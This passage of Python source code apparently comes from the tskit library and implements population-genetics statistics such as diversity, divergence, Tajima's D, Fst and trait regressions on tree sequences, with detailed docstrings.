equal to the number of sample sets and returns a one-dimensional array.
:param int output_dim: The length of ``f``'s return value.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param bool polarised: Whether to leave the ancestral state out of computations:
see :ref:`sec_stats` for more details.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool strict: Whether to check that f(0) and f(total weight) are zero.
:return: A ndarray with shape equal to (num windows, num statistics).
""" # noqa: B950
# helper function for common case where weights are indicators of sample sets
for U in sample_sets:
if len(U) != len(set(U)):
raise ValueError(
"Elements of sample_sets must be lists without repeated elements."
)
if len(U) == 0:
raise ValueError("Elements of sample_sets cannot be empty.")
for u in U:
if not self.node(u).is_sample():
raise ValueError("Not all elements of sample_sets are samples.")
W = np.array([[float(u in A) for A in sample_sets] for u in self.samples()])
return self.general_stat(
W,
f,
output_dim,
windows=windows,
polarised=polarised,
mode=mode,
span_normalise=span_normalise,
strict=strict,
)
def parse_windows(self, windows):
# Note: need to make sure windows is a string or we try to compare the
# target with a numpy array elementwise.
if windows is None:
windows = [0.0, self.sequence_length]
elif isinstance(windows, str):
if windows == "trees":
windows = self.breakpoints(as_array=True)
elif windows == "sites":
# breakpoints are at 0.0 and at the sites and at the end
windows = np.concatenate(
[
[] if self.num_sites > 0 else [0.0],
self.tables.sites.position,
[self.sequence_length],
]
)
windows[0] = 0.0
else:
raise ValueError(
f"Unrecognized window specification {windows}:",
"the only allowed strings are 'sites' or 'trees'",
)
return np.array(windows)
def __run_windowed_stat(self, windows, method, *args, **kwargs):
strip_dim = windows is None
windows = self.parse_windows(windows)
stat = method(*args, **kwargs, windows=windows)
if strip_dim:
stat = stat[0]
return stat
def __one_way_sample_set_stat(
self,
ll_method,
sample_sets,
windows=None,
mode=None,
span_normalise=True,
polarised=False,
):
if sample_sets is None:
sample_sets = self.samples()
# First try to convert to a 1D numpy array. If it is, then we strip off
# the corresponding dimension from the output.
drop_dimension = False
try:
sample_sets = np.array(sample_sets, dtype=np.int32)
except ValueError:
pass
else:
# If we've successfully converted sample_sets to a 1D numpy array
# of integers then drop the dimension
if len(sample_sets.shape) == 1:
sample_sets = [sample_sets]
drop_dimension = True
sample_set_sizes = np.array(
[len(sample_set) for sample_set in sample_sets], dtype=np.uint32
)
if np.any(sample_set_sizes == 0):
raise ValueError("Sample sets must contain at least one element")
flattened = util.safe_np_int_cast(np.hstack(sample_sets), np.int32)
stat = self.__run_windowed_stat(
windows,
ll_method,
sample_set_sizes,
flattened,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
if drop_dimension:
stat = stat.reshape(stat.shape[:-1])
return stat
    def __k_way_sample_set_stat(
        self,
        ll_method,
        k,
        sample_sets,
        indexes=None,
        windows=None,
        mode=None,
        span_normalise=True,
        polarised=False,
    ):
        """
        Run a k-way sample-set statistic via the low-level ``ll_method``.

        ``indexes`` selects which ``k``-tuples of sample sets are compared;
        if omitted, there must be exactly ``k`` sample sets, which are then
        compared with each other. A single index tuple may be given instead
        of a list of tuples, in which case the corresponding dimension is
        dropped from the output.
        """
        sample_set_sizes = np.array(
            [len(sample_set) for sample_set in sample_sets], dtype=np.uint32
        )
        if np.any(sample_set_sizes == 0):
            raise ValueError("Sample sets must contain at least one element")
        # The low-level code takes the sets as one flattened ID array plus
        # the per-set sizes.
        flattened = util.safe_np_int_cast(np.hstack(sample_sets), np.int32)
        if indexes is None:
            if len(sample_sets) != k:
                raise ValueError(
                    "Must specify indexes if there are not exactly {} sample "
                    "sets.".format(k)
                )
            indexes = np.arange(k, dtype=np.int32)
        # A single 1D index tuple means "one statistic": wrap it into a 2D
        # array and remember to strip the extra output dimension afterwards.
        drop_dimension = False
        indexes = util.safe_np_int_cast(indexes, np.int32)
        if len(indexes.shape) == 1:
            indexes = indexes.reshape((1, indexes.shape[0]))
            drop_dimension = True
        if len(indexes.shape) != 2 or indexes.shape[1] != k:
            raise ValueError(
                "Indexes must be convertable to a 2D numpy array with {} "
                "columns".format(k)
            )
        stat = self.__run_windowed_stat(
            windows,
            ll_method,
            sample_set_sizes,
            flattened,
            indexes,
            mode=mode,
            span_normalise=span_normalise,
            polarised=polarised,
        )
        if drop_dimension:
            stat = stat.reshape(stat.shape[:-1])
        return stat
############################################
# Statistics definitions
############################################
def diversity(
self, sample_sets=None, windows=None, mode="site", span_normalise=True
):
"""
Computes mean genetic diversity (also knowns as "Tajima's pi") in each of the
sets of nodes from ``sample_sets``.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Note that this quantity can also be computed by the
:meth:`divergence <.TreeSequence.divergence>` method.
What is computed depends on ``mode``:
"site"
Mean pairwise genetic diversity: the average across distinct,
randomly chosen pairs of chromosomes, of the density of sites at
which the two carry different alleles, per unit of chromosome length.
"branch"
Mean distance in the tree: the average across distinct, randomly chosen pairs
of chromsomes and locations in the window, of the mean distance in the tree
between the two samples (in units of time).
"node"
For each node, the proportion of genome on which the node is an ancestor to
only one of a random pair from the sample set, averaged over choices of pair.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A numpy array.
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.diversity,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def divergence(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes mean genetic divergence between (and within) pairs of
sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
As a special case, an index ``(j, j)`` will compute the
:meth:`diversity <.TreeSequence.diversity>` of ``sample_set[j]``.
What is computed depends on ``mode``:
"site"
Mean pairwise genetic divergence: the average across distinct,
randomly chosen pairs of chromosomes (one from each sample set), of
the density of sites at which the two carry different alleles, per
unit of chromosome length.
"branch"
Mean distance in the tree: the average across distinct, randomly
chosen pairs of chromsomes (one from each sample set) and locations
in the window, of the mean distance in the tree between the two
samples (in units of time).
"node"
For each node, the proportion of genome on which the node is an ancestor to
only one of a random pair (one from each sample set), averaged over
choices of pair.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.divergence,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
# JK: commenting this out for now to get the other methods well tested.
# Issue: https://github.com/tskit-dev/tskit/issues/201
# def divergence_matrix(self, sample_sets, windows=None, mode="site"):
# """
# Finds the mean divergence between pairs of samples from each set of
# samples and in each window. Returns a numpy array indexed by (window,
# sample_set, sample_set). Diagonal entries are corrected so that the
# value gives the mean divergence for *distinct* samples, but it is not
# checked whether the sample_sets are disjoint (so offdiagonals are not
# corrected). For this reason, if an element of `sample_sets` has only
# one element, the corresponding diagonal will be NaN.
# The mean divergence between two samples is defined to be the mean: (as
# a TreeStat) length of all edges separating them in the tree, or (as a
# SiteStat) density of segregating sites, at a uniformly chosen position
# on the genome.
# :param list sample_sets: A list of sets of IDs of samples.
# :param iterable windows: The breakpoints of the windows (including start
# and end, so has one more entry than number of windows).
# :return: A list of the upper triangle of mean TMRCA values in row-major
# order, including the diagonal.
# """
# ns = len(sample_sets)
# indexes = [(i, j) for i in range(ns) for j in range(i, ns)]
# x = self.divergence(sample_sets, indexes, windows, mode=mode)
# nw = len(windows) - 1
# A = np.ones((nw, ns, ns), dtype=float)
# for w in range(nw):
# k = 0
# for i in range(ns):
# for j in range(i, ns):
# A[w, i, j] = A[w, j, i] = x[w][k]
# k += 1
# return A
def genetic_relatedness(
self,
sample_sets,
indexes=None,
windows=None,
mode="site",
span_normalise=True,
polarised=False,
proportion=True,
):
"""
Computes genetic relatedness between (and within) pairs of
sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
:ref:`polarised <sec_stats_polarisation>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``:
"site"
Number of pairwise allelic matches in the window between two
sample sets relative to the rest of the sample sets. To be precise,
let `m(u,v)` denote the total number of alleles shared between
nodes `u` and `v`, and let `m(I,J)` be the sum of `m(u,v)` over all
nodes `u` in sample set `I` and `v` in sample set `J`. Let `S` and
`T` be independently chosen sample sets. Then, for sample sets `I`
and `J`, this computes `E[m(I,J) - m(I,S) - m(J,T) + m(S,T)]`.
This can also be seen as the covariance of a quantitative trait
determined by additive contributions from the genomes in each
sample set. Let each allele be associated with an effect drawn from
a `N(0,1/2)` distribution, and let the trait value of a sample set
be the sum of its allele effects. Then, this computes the covariance
between the trait values of two sample sets. For example, to
compute covariance between the traits of diploid individuals, each
sample set would be the pair of genomes of each individual; if
``proportion=True``, this then corresponds to :math:`K_{c0}` in
`Speed & Balding (2014) <https://www.nature.com/articles/nrg3821>`_.
"branch"
Total area of branches in the window ancestral to pairs of samples
in two sample sets relative to the rest of the sample sets. To be
precise, let `B(u,v)` denote the total area of all branches
ancestral to nodes `u` and `v`, and let `B(I,J)` be the sum of
`B(u,v)` over all nodes `u` in sample set `I` and `v` in sample set
`J`. Let `S` and `T` be two independently chosen sample sets. Then
for sample sets `I` and `J`, this computes
`E[B(I,J) - B(I,S) - B(J,T) + B(S,T)]`.
"node"
For each node, the proportion of the window over which pairs of
samples in two sample sets are descendants, relative to the rest of
the sample sets. To be precise, for each node `n`, let `N(u,v)`
denote the proportion of the window over which samples `u` and `v`
are descendants of `n`, and let and let `N(I,J)` be the sum of
`N(u,v)` over all nodes `u` in sample set `I` and `v` in sample set
`J`. Let `S` and `T` be two independently chosen sample sets. Then
for sample sets `I` and `J`, this computes
`E[N(I,J) - N(I,S) - N(J,T) + N(S,T)]`.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:param bool proportion: Whether to divide the result by
:meth:`.segregating_sites`, called with the same ``windows`` and
``mode`` (defaults to True). Note that this counts sites
that are segregating between *any* of the samples of *any* of the
sample sets (rather than segregating between all of the samples of
the tree sequence).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if proportion:
# TODO this should be done in C also
all_samples = list({u for s in sample_sets for u in s})
denominator = self.segregating_sites(
sample_sets=[all_samples],
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
else:
denominator = 1
numerator = self.__k_way_sample_set_stat(
self._ll_tree_sequence.genetic_relatedness,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
with np.errstate(divide="ignore", invalid="ignore"):
out = numerator / denominator
return out
def trait_covariance(self, W, windows=None, mode="site", span_normalise=True):
"""
Computes the mean squared covariances between each of the columns of ``W``
(the "phenotypes") and inheritance along the tree sequence.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on all samples in the tree sequence.
Concretely, if `g` is a binary vector that indicates inheritance from an allele,
branch, or node and `w` is a column of W, normalised to have mean zero,
then the covariance of `g` and `w` is :math:`\\sum_i g_i w_i`, the sum of the
weights corresponding to entries of `g` that are `1`. Since weights sum to
zero, this is also equal to the sum of weights whose entries of `g` are 0.
So, :math:`cov(g,w)^2 = ((\\sum_i g_i w_i)^2 + (\\sum_i (1-g_i) w_i)^2)/2`.
What is computed depends on ``mode``:
"site"
The sum of squared covariances between presence/absence of each allele and
phenotypes, divided by length of the window (if ``span_normalise=True``).
This is computed as sum_a (sum(w[a])^2 / 2), where
w is a column of W with the average subtracted off,
and w[a] is the sum of all entries of w corresponding to samples
carrying allele "a", and the first sum is over all alleles.
"branch"
The sum of squared covariances between the split induced by each branch and
phenotypes, multiplied by branch length, averaged across trees in
the window. This is computed as above: a branch with total weight
w[b] below b contributes (branch length) * w[b]^2 to the total
value for a tree. (Since the sum of w is zero, the total weight
below b and not below b are equal, canceling the factor of 2
above.)
"node"
For each node, the squared covariance between the property of
inheriting from this node and phenotypes, computed as in "branch".
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each "phenotype".
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if W.shape[0] != self.num_samples:
raise ValueError(
"First trait dimension must be equal to number of samples."
)
return self.__run_windowed_stat(
windows,
self._ll_tree_sequence.trait_covariance,
W,
mode=mode,
span_normalise=span_normalise,
)
def trait_correlation(self, W, windows=None, mode="site", span_normalise=True):
"""
Computes the mean squared correlations between each of the columns of ``W``
(the "phenotypes") and inheritance along the tree sequence.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on all samples in the tree sequence.
This is computed as squared covariance in
:meth:`trait_covariance <.TreeSequence.trait_covariance>`,
but divided by :math:`p (1-p)`, where `p` is the proportion of samples
inheriting from the allele, branch, or node in question.
What is computed depends on ``mode``:
"site"
The sum of squared correlations between presence/absence of each allele and
phenotypes, divided by length of the window (if ``span_normalise=True``).
This is computed as the
:meth:`trait_covariance <.TreeSequence.trait_covariance>`
divided by the variance of the relevant column of W
and by ;math:`p * (1 - p)`, where :math:`p` is the allele frequency.
"branch"
The sum of squared correlations between the split induced by each branch and
phenotypes, multiplied by branch length, averaged across trees in
the window. This is computed as the
:meth:`trait_covariance <.TreeSequence.trait_covariance>`,
divided by the variance of the column of w
and by :math:`p * (1 - p)`, where :math:`p` is the proportion of
the samples lying below the branch.
"node"
For each node, the squared correlation between the property of
inheriting from this node and phenotypes, computed as in "branch".
Note that above we divide by the **sample** variance, which for a
vector x of length n is ``np.var(x) * n / (n-1)``.
:param numpy.ndarray W: An array of values with one row for each sample and one
column for each "phenotype". Each column must have positive standard
deviation.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
if W.shape[0] != self.num_samples:
raise ValueError(
"First trait dimension must be equal to number of samples."
)
sds = np.std(W, axis=0)
if np.any(sds == 0):
raise ValueError(
"Weight columns must have positive variance", "to compute correlation."
)
return self.__run_windowed_stat(
windows,
self._ll_tree_sequence.trait_correlation,
W,
mode=mode,
span_normalise=span_normalise,
)
def trait_regression(self, *args, **kwargs):
"""
Deprecated synonym for
:meth:`trait_linear_model <.TreeSequence.trait_linear_model>`.
"""
warnings.warn(
"This is deprecated: please use trait_linear_model( ) instead.",
FutureWarning,
)
return self.trait_linear_model(*args, **kwargs)
    def trait_linear_model(
        self, W, Z=None, windows=None, mode="site", span_normalise=True
    ):
        """
        Finds the relationship between trait and genotype after accounting for
        covariates. Concretely, for each trait w (i.e., each column of W),
        this does a least-squares fit of the linear model :math:`w \\sim g + Z`,
        where :math:`g` is inheritance in the tree sequence (e.g., genotype)
        and the columns of :math:`Z` are covariates, and returns the squared
        coefficient of :math:`g` in this linear model.
        See the :ref:`statistics interface <sec_stats_interface>` section for details on
        :ref:`windows <sec_stats_windows>`,
        :ref:`mode <sec_stats_mode>`,
        :ref:`span normalise <sec_stats_span_normalise>`,
        and :ref:`return value <sec_stats_output_format>`.
        Operates on all samples in the tree sequence.
        To do this, if `g` is a binary vector that indicates inheritance from an allele,
        branch, or node and `w` is a column of W, there are :math:`k` columns of
        :math:`Z`, and the :math:`k+2`-vector :math:`b` minimises
        :math:`\\sum_i (w_i - b_0 - b_1 g_i - b_2 z_{2,i} - ... b_{k+2} z_{k+2,i})^2`
        then this returns the number :math:`b_1^2`. If :math:`g` lies in the linear span
        of the columns of :math:`Z`, then :math:`b_1` is set to 0. To fit the
        linear model without covariates (only the intercept), set `Z = None`.
        What is computed depends on ``mode``:
        "site"
            Computes the sum of :math:`b_1^2/2` for each allele in the window,
            as above with :math:`g` indicating presence/absence of the allele,
            then divided by the length of the window if ``span_normalise=True``.
            (For biallelic loci, this number is the same for both alleles, and so summing
            over each cancels the factor of two.)
        "branch"
            The squared coefficient `b_1^2`, computed for the split induced by each
            branch (i.e., with :math:`g` indicating inheritance from that branch),
            multiplied by branch length and tree span, summed over all trees
            in the window, and divided by the length of the window if
            ``span_normalise=True``.
        "node"
            For each node, the squared coefficient `b_1^2`, computed for the property of
            inheriting from this node, as in "branch".
        :param numpy.ndarray W: An array of values with one row for each sample and one
            column for each "phenotype".
        :param numpy.ndarray Z: An array of values with one row for each sample and one
            column for each "covariate", or `None`. Columns of `Z` must be linearly
            independent.
        :param list windows: An increasing list of breakpoints between the windows
            to compute the statistic in.
        :param str mode: A string giving the "type" of the statistic to be computed
            (defaults to "site").
        :param bool span_normalise: Whether to divide the result by the span of the
            window (defaults to True).
        :return: A ndarray with shape equal to (num windows, num statistics).
        """
        if W.shape[0] != self.num_samples:
            raise ValueError(
                "First trait dimension must be equal to number of samples."
            )
        if Z is None:
            # No covariates: fit the intercept only.
            Z = np.ones((self.num_samples, 1))
        else:
            # Append an intercept column, but only if doing so keeps Z full
            # rank (i.e. Z does not already span the constant vector).
            tZ = np.column_stack([Z, np.ones((Z.shape[0], 1))])
            if np.linalg.matrix_rank(tZ) == tZ.shape[1]:
                Z = tZ
        if Z.shape[0] != self.num_samples:
            raise ValueError("First dimension of Z must equal the number of samples.")
        if np.linalg.matrix_rank(Z) < Z.shape[1]:
            raise ValueError("Matrix of covariates is computationally singular.")
        # numpy returns a lower-triangular cholesky
        K = np.linalg.cholesky(np.matmul(Z.T, Z)).T
        # Whiten the covariates: since K.T @ K == Z.T @ Z, the columns of
        # Z @ inv(K) are orthonormal.
        Z = np.matmul(Z, np.linalg.inv(K))
        return self.__run_windowed_stat(
            windows,
            self._ll_tree_sequence.trait_linear_model,
            W,
            Z,
            mode=mode,
            span_normalise=span_normalise,
        )
def segregating_sites(
self, sample_sets=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the density of segregating sites for each of the sets of nodes
from ``sample_sets``, and related quantities.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. For a sample set ``A``, computes:
"site"
The sum over sites of the number of alleles found in ``A`` at each site
minus one, per unit of chromosome length.
If all sites have at most two alleles, this is the density of sites
that are polymorphic in ``A``. To get the **number** of segregating minor
alleles per window, pass ``span_normalise=False``.
"branch"
The total length of all branches in the tree subtended by the samples in
``A``, averaged across the window.
"node"
The proportion of the window on which the node is ancestral to some,
but not all, of the samples in ``A``.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.segregating_sites,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def allele_frequency_spectrum(
self,
sample_sets=None,
windows=None,
mode="site",
span_normalise=True,
polarised=False,
):
"""
Computes the allele frequency spectrum (AFS) in windows across the genome for
with respect to the specified ``sample_sets``.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`sample sets <sec_stats_sample_sets>`,
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
:ref:`polarised <sec_stats_polarisation>`,
and :ref:`return value <sec_stats_output_format>`.
and see :ref:`sec_tutorial_afs` for examples of how to use this method.
Similar to other windowed stats, the first dimension in the returned array
corresponds to windows, such that ``result[i]`` is the AFS in the ith
window. The AFS in each window is a k-dimensional numpy array, where k is
the number of input sample sets, such that ``result[i, j0, j1, ...]`` is the
value associated with frequency ``j0`` in ``sample_sets[0]``, ``j1`` in
``sample_sets[1]``, etc, in window ``i``. From here, we will assume that
``afs`` corresponds to the result in a single window, i.e.,
``afs = result[i]``.
If a single sample set is specified, the allele frequency spectrum within
this set is returned, such that ``afs[j]`` is the value associated with
frequency ``j``. Thus, singletons are counted in ``afs[1]``, doubletons in
``afs[2]``, and so on. The zeroth entry counts alleles or branches not
seen in the samples but that are polymorphic among the rest of the samples
of the tree sequence; likewise, the last entry counts alleles fixed in
the sample set but polymorphic in the entire set of samples. Please see
the :ref:`sec_tutorial_afs_zeroth_entry` for an illustration.
.. warning:: Please note that singletons are **not** counted in the initial
entry in each AFS array (i.e., ``afs[0]``), but in ``afs[1]``.
If ``sample_sets`` is None (the default), the allele frequency spectrum
for all samples in the tree sequence is returned.
If more than one sample set is specified, the **joint** allele frequency
spectrum within windows is returned. For example, if we set
``sample_sets = [S0, S1]``, then afs[1, 2] counts the number of sites that
are singletons within S0 and doubletons in S1. The dimensions of the
output array will be ``[num_windows] + [1 + len(S) for S in sample_sets]``.
If ``polarised`` is False (the default) the AFS will be *folded*, so that
the counts do not depend on knowing which allele is ancestral. If folded,
the frequency spectrum for a single sample set ``S`` has ``afs[j] = 0`` for
all ``j > len(S) / 2``, so that alleles at frequency ``j`` and ``len(S) - j``
both add to the same entry. If there is more than one sample set, the
returned array is "lower triangular" in a similar way. For more details,
especially about handling of multiallelic sites, see :ref:`sec_stats_afs`.
What is computed depends on ``mode``:
"site"
The number of alleles at a given frequency within the specified sample
sets for each window, per unit of sequence length. To obtain the total
number of alleles, set ``span_normalise`` to False.
"branch"
The total length of branches in the trees subtended by subsets of the
specified sample sets, per unit of sequence length. To obtain the
total, set ``span_normalise`` to False.
"node"
Not supported for this method (raises a ValueError).
For example, suppose that `S0` is a list of 5 sample IDs, and `S1` is
a list of 3 other sample IDs. Then `afs = ts.allele_frequency_spectrum([S0, S1],
mode="site", span_normalise=False)` will be a 5x3 numpy array, and if
there are six alleles that are present in only one sample of `S0` but
two samples of `S1`, then `afs[1,2]` will be equal to 6. Similarly,
`branch_afs = ts.allele_frequency_spectrum([S0, S1], mode="branch",
span_normalise=False)` will also be a 5x3 array, and `branch_afs[1,2]`
will be the total area (i.e., length times span) of all branches that
are above exactly one sample of `S0` and two samples of `S1`.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of samples to compute the joint allele frequency
:param list windows: An increasing list of breakpoints between windows
along the genome.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A (k + 1) dimensional numpy array, where k is the number of sample
sets specified.
"""
# TODO should we allow a single sample_set to be specified here as a 1D array?
# This won't change the output dimensions like the other stats.
if sample_sets is None:
sample_sets = [self.samples()]
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.allele_frequency_spectrum,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
polarised=polarised,
)
    def Tajimas_D(self, sample_sets=None, windows=None, mode="site"):
        """
        Computes Tajima's D of sets of nodes from ``sample_sets`` in windows.
        Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
        section for details on how the ``sample_sets`` argument is interpreted
        and how it interacts with the dimensions of the output array.
        See the :ref:`statistics interface <sec_stats_interface>` section for details on
        :ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
        and :ref:`return value <sec_stats_output_format>`.
        Operates on ``k = 1`` sample sets at a
        time. For a sample set ``X`` of ``n`` nodes, if ``T`` is the mean
        number of pairwise differing sites in ``X`` and ``S`` is the number of
        sites segregating in ``X`` (computed with :meth:`diversity
        <.TreeSequence.diversity>` and :meth:`segregating sites
        <.TreeSequence.segregating_sites>`, respectively, both not span
        normalised), then Tajima's D is
        .. code-block:: python
            D = (T - S / h) / sqrt(a * S + (b / c) * S * (S - 1))
            h = 1 + 1 / 2 + ... + 1 / (n - 1)
            g = 1 + 1 / 2 ** 2 + ... + 1 / (n - 1) ** 2
            a = (n + 1) / (3 * (n - 1) * h) - 1 / h ** 2
            b = 2 * (n ** 2 + n + 3) / (9 * n * (n - 1)) - (n + 2) / (h * n) + g / h ** 2
            c = h ** 2 + g
        What is computed for diversity and divergence depends on ``mode``;
        see those functions for more details.
        :param list sample_sets: A list of lists of Node IDs, specifying the
            groups of nodes to compute the statistic with.
        :param list indexes: A list of 2-tuples, or None.
        :param list windows: An increasing list of breakpoints between the windows
            to compute the statistic in.
        :param str mode: A string giving the "type" of the statistic to be computed
            (defaults to "site").
        :return: A ndarray with shape equal to (num windows, num statistics).
        """
        # TODO this should be done in C as we'll want to support this method there.
        def tjd_func(sample_set_sizes, flattened, **kwargs):
            # n is a 1D array: one sample-set size per sample set.
            n = sample_set_sizes
            # T: mean pairwise diversity; S: segregating sites. Both are
            # computed un-span-normalised (enforced by the caller below).
            # NOTE(review): this uses ``self.ll_tree_sequence`` while the
            # neighbouring methods use ``self._ll_tree_sequence`` — presumably
            # the former is a public property for the latter; confirm.
            T = self.ll_tree_sequence.diversity(n, flattened, **kwargs)
            S = self.ll_tree_sequence.segregating_sites(n, flattened, **kwargs)
            # h and g are the (generalised) harmonic numbers a1 and a2 from
            # the formula in the docstring, one entry per sample set.
            h = np.array([np.sum(1 / np.arange(1, nn)) for nn in n])
            g = np.array([np.sum(1 / np.arange(1, nn) ** 2) for nn in n])
            # Suppress divide/invalid warnings: e.g. for nn == 1 the harmonic
            # sums are 0 and the expressions below divide by zero, yielding
            # NaN rather than raising.
            with np.errstate(invalid="ignore", divide="ignore"):
                a = (n + 1) / (3 * (n - 1) * h) - 1 / h ** 2
                b = (
                    2 * (n ** 2 + n + 3) / (9 * n * (n - 1))
                    - (n + 2) / (h * n)
                    + g / h ** 2
                )
                # c = h ** 2 + g is inlined in the denominator below.
                D = (T - S / h) / np.sqrt(a * S + (b / (h ** 2 + g)) * S * (S - 1))
            return D

        # span_normalise=False: the formula requires raw T and S counts.
        return self.__one_way_sample_set_stat(
            tjd_func, sample_sets, windows=windows, mode=mode, span_normalise=False
        )
def Fst(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes "windowed" Fst between pairs of sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
For sample sets ``X`` and ``Y``, if ``d(X, Y)`` is the
:meth:`divergence <.TreeSequence.divergence>`
between ``X`` and ``Y``, and ``d(X)`` is the
:meth:`diversity <.TreeSequence.diversity>` of ``X``, then what is
computed is
.. code-block:: python
Fst = 1 - 2 * (d(X) + d(Y)) / (d(X) + 2 * d(X, Y) + d(Y))
What is computed for diversity and divergence depends on ``mode``;
see those functions for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
# TODO this should really be implemented in C (presumably C programmers will want
# to compute Fst too), but in the mean time implementing using the low-level
# calls has two advantages: (a) we automatically change dimensions like the other
# two-way stats and (b) it's a bit more efficient because we're not messing
# around with indexes and samples sets twice.
def fst_func(sample_set_sizes, flattened, indexes, **kwargs):
